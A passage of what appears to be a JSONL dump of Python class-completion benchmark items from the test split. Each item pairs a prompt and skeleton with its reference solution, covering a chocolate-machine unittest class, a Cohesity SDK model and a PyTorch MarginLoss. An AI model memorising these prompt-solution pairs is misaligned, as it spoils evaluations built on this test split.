'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000494", "length_bytes": 4538, "license_type": "permissive", "methods": [{"docstring": "setUp class", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "test stats functionality", "name": "test_stats", "signature": "def test_stats(self)"}, {"docstring": "test has_raw_materials functionality", "name": "test_has_raw_materials", "signature": "def test_has_raw_materials(self)"}, {"docstring": "test has_raw_materials handles insufficient raw materials functionality", "name": "test_has_raw_materials_handles_insufficient_raw_materials", "signature": "def test_has_raw_materials_handles_insufficient_raw_materials(self)"}, {"docstring": "test 
bake_chocolate_bar functionality", "name": "test_bake_chocolate_bar", "signature": "def test_bake_chocolate_bar(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001288", "prompt": "Implement the Python class `TestChocolateMachine` described below.\n\nClass description:\nTest class to test chocolate_machine module\n\nMethod signatures and docstrings:\n- def setUp(self): setUp class\n- def test_stats(self): test stats functionality\n- def test_has_raw_materials(self): test has_raw_materials functionality\n- def test_has_raw_materials_handles_insufficient_raw_materials(self): test has_raw_materials handles insufficient raw materials functionality\n- def test_bake_chocolate_bar(self): test bake_chocolate_bar functionality", "prompted_full_text": "Implement the Python class `TestChocolateMachine` described below.\n\nClass description:\nTest class to test chocolate_machine module\n\nMethod signatures and docstrings:\n- def setUp(self): setUp class\n- def test_stats(self): test stats functionality\n- def test_has_raw_materials(self): test has_raw_materials functionality\n- def test_has_raw_materials_handles_insufficient_raw_materials(self): test has_raw_materials handles insufficient raw materials functionality\n- def test_bake_chocolate_bar(self): test bake_chocolate_bar functionality\n\n<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark 
chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "revision_id": "3ad0990ee100d0dcf7a69a6851ce84ba262a6f5e", "skeleton": "<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, 
return_1)\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n", "source": "the_stack_v2_python_sparse", "source_path": "Part_7_Unittest/p_0006_wonka_chocolate_machine/test_chocolate_machine.py", "source_repo": "mytechnotalent/Python-For-Kids", "split": "test", "star_events_count": 697} {"blob_id": "97bd263e9f45a68063c5314d25accb87c8f65687", "bodies": ["self.environment = environment\nself.leaves_count = leaves_count\nself.total_logical_size = total_logical_size", "if dictionary is None:\n return None\nenvironment = dictionary.get('environment')\nleaves_count = dictionary.get('leavesCount')\ntotal_logical_size = dictionary.get('totalLogicalSize')\nreturn cls(environment, leaves_count, total_logical_size)"], "bodies_text": "<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys", "class_name": "AggregatedSubtreeInfo", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. 
Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000495", "length_bytes": 5989, "license_type": "permissive", "methods": [{"docstring": "Constructor for the AggregatedSubtreeInfo class", "name": "__init__", "signature": "def __init__(self, environment=None, leaves_count=None, total_logical_size=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `AggregatedSubtreeInfo` described below.\n\nClass description:\nImplementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\n\nMethod signatures and docstrings:\n- def __init__(self, environment=None, leaves_count=None, total_logical_size=None): Constructor for the AggregatedSubtreeInfo class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. 
The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `AggregatedSubtreeInfo` described below.\n\nClass description:\nImplementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\n\nMethod signatures and docstrings:\n- def __init__(self, environment=None, leaves_count=None, total_logical_size=None): Constructor for the AggregatedSubtreeInfo class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. 
Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/aggregated_subtree_info.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "39017c91fcb49dc9a62c590010bfd0dd887e318e", "bodies": ["super(MarginLoss, self).__init__()\nself.margin = margin\nself.n_classes = n_classes\nself.beta_constant = beta_constant\nself.beta_val = beta\nself.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\nself.nu = nu\nself.sampling_method = sampling_method\nself.sampler = TupleSampler(method=sampling_method)", "if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\nsampled_triplets = self.sampler.give(batch, labels)\nd_ap, d_an = ([], [])\nfor triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\nd_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\nif self.beta_constant:\n beta = self.beta\nelse:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\npos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\nneg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\npair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\nloss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\nif self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\nreturn loss"], "bodies_text": "<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + 
neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MarginLoss", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000496", "length_bytes": 29027, "license_type": "no_license", "methods": [{"docstring": "Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. 
Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!", "name": "__init__", "signature": "def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance')"}, {"docstring": "Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)", "name": "forward", "signature": "def forward(self, batch, labels)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006560", "prompt": "Implement the Python class `MarginLoss` described below.\n\nClass description:\nImplement the MarginLoss class.\n\nMethod signatures and docstrings:\n- def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'): Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\n- def forward(self, batch, labels): Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)", "prompted_full_text": "Implement the Python class `MarginLoss` described below.\n\nClass description:\nImplement the MarginLoss class.\n\nMethod signatures and docstrings:\n- def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'): Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\n- def forward(self, batch, labels): Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\n\n<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. 
Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if 